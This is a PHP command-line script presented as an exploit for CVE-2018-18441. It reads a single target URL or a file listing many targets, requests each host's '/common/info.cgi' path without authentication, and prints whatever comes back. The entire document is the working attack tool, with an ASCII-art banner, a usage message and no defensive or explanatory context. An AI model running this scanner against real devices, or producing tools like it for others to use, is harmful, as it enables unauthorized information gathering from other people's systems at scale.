<?php 
##Exploit for CVE-2018-18441


class cve{

    private array $argv ; 
    private int $argc ; 
    private array $targets ;
    public function __construct(){

        global $argc, $argv ; 
        $this->argc = $argc ;
        $this->argv = $argv ;

        $this->clear_screen();
        $this->print_banner() ; 
        if ($this->argc ===1 or $this->argc > 3)
        {
            $this->print_help();
            $error = ($this->argc ===1 ) ? "[!] No args supplied!\n" : "[!] Too many args!\n";
            die($error) ; 
        }
        else {
            $this->process_args_and_start_scan() ; 
        }

    }
    private function print_banner(){   
        
        $banner = <<<EOD
 CVE
 ____   ___  _  ___        _  ___  _  _   _  _   _
|___ \ / _ \/ |( _ )      / |( _ )| || | | || | / |
  __) | | | | |/ _ \ _____| |/ _ \| || |_| || |_| |
 / __/| |_| | | (_) |_____| | (_) |__   _|__   _| |
|_____|\___/|_|\___/      |_|\___/   |_|    |_| |_|
                                         by: K4RL0S\n
EOD; 
        echo $banner ; 

    }

    private function clear_screen():void 
    {
        echo "\033[2J\033[H";
    }


    private function print_help(): void
    {
        echo "Help:\n" ; 
        echo "\t-f \t\t File Containing Targets list\n" ;
        echo "\t-u \t\t Scan A Single Target.\n" ;
        echo "examples: \n" ; 
        echo "\t".$this->argv[0] ." -f filename.txt\n" ;
        echo "\t".$this->argv[0]." -u http://target:port/ \n";

    }


    private function process_args_and_start_scan(): void
    {

        switch ($this->argv[1])
            {
                case "-f":
                    
                    $this->load_from_file()  ;
                    break ; 
                case "-u":
                    echo "[*] Scanning single terget \n" ; 
                    $this->targets[] = $this->argv[2] ; 
                    break ; 
                default:
                    die("[!] Invalid args!\n") ; 
  
            }
        // call the scan start func;
        $this->start_scan(); 
        
    }

    private function load_from_file(): void
    {
        $file_path =$this->argv[2] ; 
        $file = fopen($file_path,'r') or die("[!] Cannot open file $file_path") ; 
        echo "[*] Loading targets from file....\n" ; 
        while (!feof($file))

        {
            $line = fgets($file);  
            $line = trim($line) ; 
            $this->targets[] = $line; 
        }

    }

    private function start_scan():void 
    {
        foreach ($this->targets as $target)
        {
            echo "[*] Scanning $target\n" ; 
            try{
            $this->scan($target)  ;
            }
            catch (Exception  $ex)
            {
                echo "[".$ex->getCode()."]" . $ex->getMessage() ."\n" ; 
            }
            finally{
               //I am karlos
            }
        }
    }

    private function scan($target)
    {
        try{
            $res= @file_get_contents($target."/common/info.cgi") ; 
            
            echo "$res\n" ;
        }
        catch (Exception $ex)
        {
            echo "[".$ex->getCode()."]" . $ex->getMessage() ."\n" ;
        }
    }


}
new cve();


?>